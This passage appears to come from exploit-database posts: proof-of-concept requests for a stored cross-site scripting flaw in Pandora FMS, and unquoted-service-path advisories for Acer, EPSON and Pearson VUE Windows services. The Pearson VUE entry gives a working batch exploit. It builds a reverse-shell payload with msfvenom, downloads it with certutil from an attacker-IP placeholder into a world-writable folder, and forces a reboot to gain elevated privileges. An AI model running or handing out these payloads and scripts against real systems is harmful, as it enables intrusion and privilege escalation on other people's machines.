Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641 Content-Length: 846 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="is_new" 1 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="page" godmode/modules/private_enterprise_numbers -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="method" add -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="pen" 123 -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="manufacturer" <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641 Content-Disposition: form-data; name="description" <img src=a onerror=alert(1)> -----------------------------195778570630678476283866516641-- ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS. # Vulnerable Parameters : name, description # Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70 # POC POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 316 Origin: http://TARGET Connection: close Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 Upgrade-Insecure-Requests: 1 id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create
  23. HireHackking

    Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path # Discovery by: Emmanuel Lujan # Discovery Date: 2020-11-26 # Vendor Homepage: https://www.acer.com/ac/en/US/content/home # Tested Version: 1.0.0.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Home Premium x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ GREGService GREGServ ice C:\Program Files (x86)\Acer\Registration\G REGsvc.exe Auto # Service info: C:\>sc qc GregService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GREGService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GREGService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  24. HireHackking

    EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-27-11 #Vendor : SEIKO EPSON Corp #Version : EPSON_PM_RPCV4_06 8.0 #Vendor Homepage : https://epson.com #Tested on OS: Windows 7 Pro #Analyze PoC : ============== C:\>sc qc EPSON_PM_RPCV4_06 [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: EPSON_PM_RPCV4_06 TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : EPSON V3 Service4(06) DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  25. HireHackking

    Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path # Discovery by: Jok3r # Discovery Date: 2020-09-14 # Vendor Homepage: https://home.pearsonvue.com/ # Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm # Tested Version: 2.3.1911 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es #Description: The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights. # Detection of unquoted service path: C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """ VUE Application Wrapper VUEApplicationWrapper C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe Auto C:\Users\VUEService>sc qc VUEApplicationWrapper [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VUEApplicationWrapper TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VUE Application Wrapper DEPENDENCIES : lanmanworkstation SERVICE_START_NAME : .\VUEService #Detection of insecure file permissions: PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\" Directory: C:\ Path Owner Access ---- ----- ------ Pearson Vue BUILTIN\Administrators Everyone Allow FullControl... #Exploit code: ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc VUEApplicationWrapper powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'" ECHO [+] Enumeration was completed successfully. ::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted. certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe" ECHO [*] Downloading VUE executable... PAUSE IF EXIST "C:\Pearson VUE\VUE.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will be rebooted. PAUSE shutdown /r /t 0 ::code end